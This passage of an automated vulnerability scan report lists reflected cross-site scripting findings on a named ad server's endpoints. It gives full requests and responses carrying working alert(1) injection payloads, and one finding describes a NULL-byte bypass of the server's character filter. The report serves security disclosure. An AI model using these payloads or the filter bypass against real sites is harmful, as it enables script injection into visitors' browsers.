Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2304

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076816/0/2687/AdId=1273359;BnId=1;itime=384563729;nodecode=yes;link=3f4cc"-alert(1)-"e7c994764d3http://www.rom.on.ca/terracottaarmy/en/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.83. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076816/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242ba"-alert(1)-"ea8878819ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076816/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_3;size=135x68;key=;grp=353;misc=1290373581762;aduho=-360;rdclick=&242ba"-alert(1)-"ea8878819ac=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2310

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076816/0/2687/AdId=1273359;BnId=1;itime=384567113;nodecode=yes;link=&242ba"-alert(1)-"ea8878819ac=1http://www.rom.on.ca/terracottaarmy/en/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.84. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1240429/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebeb1"-alert(1)-"39d5bc50805 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1240429/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_4;size=135x68;key=;grp=353;misc=1290373581938;aduho=-360;rdclick=ebeb1"-alert(1)-"39d5bc50805 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2365

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1240429/0/2687/AdId=1115502;BnId=1;itime=384557883;nodecode=yes;link=ebeb1"-alert(1)-"39d5bc50805http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001765\" title=\"\" target=\"_blank\">
...[SNIP]...

2.85. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1240429/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95834"-alert(1)-"99ca9b2fcd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1240429/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_4;size=135x68;key=;grp=353;misc=1290373581938;aduho=-360;rdclick=&95834"-alert(1)-"99ca9b2fcd2=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2371

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1240429/0/2687/AdId=1115502;BnId=1;itime=384561721;nodecode=yes;link=&95834"-alert(1)-"99ca9b2fcd2=1http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001765\" title=\"\" target=\"_blank\">
...[SNIP]...

2.86. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245415/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28914'-alert(1)-'c43e7f73c9e was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245415/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_4;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886803;aduho=-360;rdclick=28914'-alert(1)-'c43e7f73c9e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 380

document.write('<a href="28914'-alert(1)-'c43e7f73c9ehttp://adserver.adtechus.com/?adlink/5214/1245415/0/2687/AdId=-3;BnId=0;itime=210256725;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank>
...[SNIP]...

2.87. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245415/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b920b'-alert(1)-'a7a037055f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245415/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_4;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886803;aduho=-360;rdclick=&b920b'-alert(1)-'a7a037055f1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 383

document.write('<a href="&b920b'-alert(1)-'a7a037055f1=1http://adserver.adtechus.com/?adlink/5214/1245415/0/2687/AdId=-3;BnId=0;itime=210257205;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank
...[SNIP]...

2.88. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc1aa"-alert(1)-"896ed7c58c4 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=bc1aa"-alert(1)-"896ed7c58c4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2504

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
//adserver.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=210253322;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=bc1aa"-alert(1)-"896ed7c58c4http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.89. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005cd82"-alert(1)-"1a904358a8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cd82"-alert(1)-"1a904358a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=&%005cd82"-alert(1)-"1a904358a8b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2516

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=369021792;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%005cd82"-alert(1)-"1a904358a8b=1http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.90. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d7a"-alert(1)-"b0263e8b42f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=&f9d7a"-alert(1)-"b0263e8b42f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2510

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
/adserver.adtechus.com/adlink/5214/1245417/0/2687/AdId=1146623;BnId=1;itime=210254094;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&f9d7a"-alert(1)-"b0263e8b42f=1http://www.torontozoo.com/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.91. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245418/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5caa'-alert(1)-'07d861fff7 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245418/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_3;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886693;aduho=-360;rdclick=c5caa'-alert(1)-'07d861fff7 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 379

document.write('<a href="c5caa'-alert(1)-'07d861fff7http://adserver.adtechus.com/?adlink/5214/1245418/0/2687/AdId=-3;BnId=0;itime=210254131;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank>
...[SNIP]...

2.92. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245418/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 236ac'-alert(1)-'55c5a44263a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245418/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_3;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886693;aduho=-360;rdclick=&236ac'-alert(1)-'55c5a44263a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 383

document.write('<a href="&236ac'-alert(1)-'55c5a44263a=1http://adserver.adtechus.com/?adlink/5214/1245418/0/2687/AdId=-3;BnId=0;itime=210255076;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank
...[SNIP]...

2.93. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906356/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cecd"-alert(1)-"459c117a26d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906356/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_300x250_1;size=300x250;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207901129;aduho=-360;rdclick=2cecd"-alert(1)-"459c117a26d HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 507

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=300x250&section=786976&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
ver.adtechus.com/adlink/5214/1135723/0/170/AdId=607818;BnId=2;itime=210260810;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=2cecd"-alert(1)-"459c117a26d\">
...[SNIP]...

2.94. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906356/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78846"-alert(1)-"8ee53af4a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906356/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_300x250_1;size=300x250;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207889496;aduho=-360;rdclick=&78846"-alert(1)-"8ee53af4a84=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 501

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=300x250&section=786976&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
://adserver.adtechus.com/adlink/5214/1135723/0/170/AdId=607818;BnId=2;itime=210264769;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&78846"-alert(1)-"8ee53af4a84=1\">
...[SNIP]...

2.95. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906388/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb7a'-alert(1)-'fda509b19b0 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906388/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_728x90_1;size=728x90;key=;grp=124;misc=1290352490578;aduho=-360;rdclick=4bb7a'-alert(1)-'fda509b19b0 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.50.0.4CE93776.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
